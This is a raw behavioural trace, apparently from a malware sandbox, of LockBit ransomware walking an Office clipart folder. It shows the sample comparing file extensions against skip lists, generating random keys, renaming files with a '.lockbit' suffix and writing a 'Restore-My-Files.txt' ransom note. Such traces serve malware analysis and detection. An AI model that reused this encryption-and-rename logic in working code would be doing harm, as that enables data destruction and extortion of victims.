[0162.220] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.220] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.220] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.220] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.220] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.220] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.220] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.220] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.220] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.221] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.221] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00808_.WMF.lockbit") returned 72 [0162.221] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00808_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00808_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0162.226] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.226] malloc (_Size=0x40068) returned 0x1ff1e60 [0162.226] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1300) returned 1 [0162.226] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.227] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0162.227] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.227] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0162.228] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.230] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00808_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00808_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.230] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.230] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.234] free (_Block=0x1fa2ed8) [0162.234] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00808_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.234] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.235] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.235] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe92d6900, ftCreationTime.dwHighDateTime=0x1bd4b0c, ftLastAccessTime.dwLowDateTime=0x6a34aa30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe92d6900, ftLastWriteTime.dwHighDateTime=0x1bd4b0c, nFileSizeHigh=0x0, nFileSizeLow=0x608, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00809_.WMF", cAlternateFileName="")) returned 1 [0162.235] lstrcmpiW (lpString1=".", lpString2="NA00809_.WMF") returned -1 [0162.235] lstrcmpiW (lpString1="..", lpString2="NA00809_.WMF") returned -1 [0162.235] PathFindExtensionW (pszPath="NA00809_.WMF") returned=".WMF" [0162.235] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.235] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.235] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.235] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.235] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.235] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.235] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.235] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.235] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.235] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.235] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.235] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.236] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.236] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.236] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.236] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.236] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.236] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.236] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.236] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.236] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.236] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.236] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.236] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.236] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.236] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.236] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.236] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.236] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.236] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.236] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.237] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.237] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.237] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.237] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.237] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.237] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.237] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.237] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.237] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.237] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.237] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.237] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.237] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.237] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.237] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.237] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.237] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00809_.WMF") returned 1 [0162.237] lstrcmpiW (lpString1="ntldr", lpString2="NA00809_.WMF") returned 1 [0162.237] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00809_.WMF") returned 1 [0162.238] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00809_.WMF") returned -1 [0162.238] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00809_.WMF") returned -1 [0162.238] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00809_.WMF") returned 1 [0162.238] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00809_.WMF") returned -1 [0162.238] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.238] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00809_.WMF") returned=".WMF" [0162.238] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.238] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.238] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.238] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.238] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.238] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.238] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.238] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.238] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.238] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.238] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.238] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.238] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.239] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.239] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.239] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.239] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.239] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.239] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.239] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.239] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.239] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.239] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.239] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.239] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.239] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.239] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.239] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.239] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00809_.WMF.lockbit") returned 72 [0162.239] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00809_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00809_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0162.241] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.241] malloc (_Size=0x40068) returned 0x3e70008 [0162.241] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=1544) returned 1 [0162.241] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.241] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0162.242] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.242] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0162.242] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0162.285] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00809_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00809_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.285] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.286] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.287] free (_Block=0x1fa2ed8) [0162.287] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00809_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.287] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.287] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.287] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6a34aa30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xd58, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00810_.WMF", cAlternateFileName="")) returned 1 [0162.287] lstrcmpiW (lpString1=".", lpString2="NA00810_.WMF") returned -1 [0162.287] lstrcmpiW (lpString1="..", lpString2="NA00810_.WMF") returned -1 [0162.287] PathFindExtensionW (pszPath="NA00810_.WMF") returned=".WMF" [0162.287] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.288] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.288] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.288] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.288] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.288] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.288] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.288] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.288] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.288] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.288] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.288] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.288] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.288] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.288] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.288] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.288] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.288] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.288] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.288] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.288] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.288] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.288] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.288] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.288] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.289] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.289] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.289] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.289] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.289] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.289] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.289] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.289] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.289] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.289] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.289] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.289] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.289] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.289] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.289] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.289] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.289] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.289] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.289] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.289] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.289] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.289] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.289] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00810_.WMF") returned 1 [0162.289] lstrcmpiW (lpString1="ntldr", lpString2="NA00810_.WMF") returned 1 [0162.289] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00810_.WMF") returned 1 [0162.290] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00810_.WMF") returned -1 [0162.290] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00810_.WMF") returned -1 [0162.290] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00810_.WMF") returned 1 [0162.290] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00810_.WMF") returned -1 [0162.290] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.290] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00810_.WMF") returned=".WMF" [0162.290] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.290] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.290] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.290] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.290] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.290] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.290] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.290] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.290] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.290] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.290] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.290] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.290] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.290] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.290] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.290] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.290] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.290] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.291] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.291] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.291] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.291] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.291] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.291] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.291] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.291] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.291] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.291] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.291] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00810_.WMF.lockbit") returned 72 [0162.291] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00810_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00810_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0162.292] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.292] malloc (_Size=0x40068) returned 0x3df0008 [0162.292] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3416) returned 1 [0162.292] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.293] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.293] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0162.293] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.294] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.294] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0162.294] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0162.298] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00810_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00810_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.298] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.298] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.300] free (_Block=0x1fa2ed8) [0162.300] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00810_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.300] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.300] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.300] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6a34aa30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3210, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00932_.WMF", cAlternateFileName="")) returned 1 [0162.300] lstrcmpiW (lpString1=".", lpString2="NA00932_.WMF") returned -1 [0162.300] lstrcmpiW (lpString1="..", lpString2="NA00932_.WMF") returned -1 [0162.300] PathFindExtensionW (pszPath="NA00932_.WMF") returned=".WMF" [0162.300] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.300] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.300] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.300] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.300] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.300] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.300] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.301] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.301] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.301] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.301] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.301] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.301] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.301] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.301] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.301] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.301] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.301] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.301] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.301] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.301] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.301] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.301] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 